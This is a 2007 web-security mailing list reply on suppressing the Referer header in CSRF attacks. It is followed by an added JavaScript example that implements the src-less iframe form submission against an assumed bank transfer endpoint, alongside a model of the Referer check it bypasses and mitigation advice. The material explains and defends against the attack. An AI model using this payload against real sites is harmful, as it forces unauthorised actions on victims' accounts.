WebApp Sec mailing list archives

Re: FW: blocking CSRF attacks


From: "Martin Johns" <martin.johns () gmail com>
Date: Thu, 20 Dec 2007 10:03:35 +0100

On 12/19/07, Paul Johnston <paj () pajhome org uk> wrote:
> It may be possible for an attacker to avoid the referer header being
> sent - if they use <meta http-equiv="refresh" ...> but I have not
> experimented with this, and it would only do this for GET requests.

There are several reliable methods to suppress the referrer which work
both for GET and POST.

E.g., in IE and FF it is sufficient to dynamically create an empty
IFrame and fill it with an HTML form that is targeted at the
victimised site. As the IFrame wasn't assigned a source URL, the
HTTP request that is initiated by submitting the form does not
contain a referrer header.

It also is still possible to *somewhat* spoof the referrer in a CSRF
attack scenario using Flash:
https://www.flashsec.org/wiki/Arbitrary_HTTP_Requests

-- Martin

-- 
Martin Johns
http://www.informatik.uni-hamburg.de/SVS/personnel/martin/index.php
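Added example, not part of Martin's message or the original thread: the src-less IFrame technique he describes, written out in JavaScript, next to a model of the Referer-based CSRF check it defeats. The victim origin (`https://bank.example`), the `/transfer` endpoint, the form field names and the sample request headers are all constructed assumptions. The browser-side function only does anything where a DOM exists; the header check is plain logic and runs anywhere.

```javascript
// Added example (not from the original post). Shows (1) the attacker side:
// an iframe created with no src, so its document is about:blank and a form
// submitted from it carries no Referer header; and (2) the defender side:
// a Referer check that treats a missing header as acceptable, which is the
// behaviour the technique relies on. All names below are assumptions.

const VICTIM_ORIGIN = "https://bank.example";          // assumed victim origin
const VICTIM_ACTION = VICTIM_ORIGIN + "/transfer";     // assumed state-changing endpoint

// Build the HTML form the attacker will write into the empty iframe.
// Values are attribute-escaped so the generated markup stays well-formed.
function buildCsrfForm(action, fields) {
  const esc = (s) =>
    String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join("");
  return `<form id="f" method="POST" action="${esc(action)}">${inputs}</form>`;
}

// Browser-only: append an iframe without a src attribute (its document is
// about:blank), write the form into it and submit. Because the submitting
// document has no http(s) URL, the browser sends the POST without a Referer.
// Returns the iframe, or null when there is no DOM (e.g. under Node).
function launchSuppressedRefererPost(action, fields) {
  if (typeof document === "undefined") return null;
  const iframe = document.createElement("iframe");
  iframe.style.display = "none";
  document.body.appendChild(iframe);                   // no src => about:blank
  const doc = iframe.contentDocument;
  doc.open();
  doc.write(buildCsrfForm(action, fields));
  doc.close();
  doc.getElementById("f").submit();
  return iframe;
}

// Defender-side model of a Referer-based CSRF check. `headers` is a plain
// object with lower-cased header names, as Node's http module presents them.
// With lenient = true a missing Referer is accepted, which is exactly what
// the src-less iframe produces; with lenient = false it is rejected.
function refererCheck(headers, allowedOrigin, { lenient }) {
  const ref = headers["referer"];
  if (ref === undefined || ref === "") return lenient;
  try {
    return new URL(ref).origin === allowedOrigin;
  } catch {
    return false;                                      // unparsable Referer
  }
}

// Constructed requests: a legitimate same-site POST, a naive cross-site POST,
// and the header set the iframe trick yields (no Referer at all).
function demo() {
  const sameSite = { referer: VICTIM_ORIGIN + "/account" };
  const crossSite = { referer: "https://evil.example/csrf.html" };
  const suppressed = {};
  return {
    lenientBlocksCrossSite: !refererCheck(crossSite, VICTIM_ORIGIN, { lenient: true }),
    lenientAllowsSuppressed: refererCheck(suppressed, VICTIM_ORIGIN, { lenient: true }),
    strictRejectsSuppressed: !refererCheck(suppressed, VICTIM_ORIGIN, { lenient: false }),
    strictAllowsSameSite: refererCheck(sameSite, VICTIM_ORIGIN, { lenient: false }),
  };
}

// Example use (attack side would run in a page under the attacker's control):
// launchSuppressedRefererPost(VICTIM_ACTION, { to: "attacker", amount: "1000" });
console.log(demo());
```

The lenient check blocks the obvious cross-site form but waves through the src-less iframe submission, so a Referer check is only useful in strict mode (reject when the header is absent), at the cost of breaking clients and proxies that strip it. A per-session anti-CSRF token does not depend on the header at all, and current browsers additionally send an Origin header on cross-site POSTs that the about:blank trick does not remove.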
